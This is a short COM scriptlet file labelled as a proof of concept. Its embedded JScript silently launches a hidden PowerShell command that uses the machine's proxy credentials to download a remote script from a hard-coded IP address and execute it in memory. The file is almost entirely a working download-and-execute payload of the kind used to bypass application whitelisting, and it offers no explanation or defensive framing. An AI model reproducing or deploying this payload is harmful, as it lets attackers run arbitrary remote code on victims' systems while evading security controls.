<?XML version="1.0"?>
  <scriptlet>
    <registration 
      progid="PoC"
      classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > 
     <!-- Proof Of Concept - Casey Smith @subTee --> 
     <!--  License: BSD3-Clause --> 
      <script language="JScript"> 
        <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $D=new-object net.webclient;$D.proxy=[Net.WebRequest]::GetSystemWebProxy();$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $D.downloadstring('http://192.168.81.1:8080/58vlKkP3H');"); ]]>
     </script>
   </registration>
  </scriptlet>
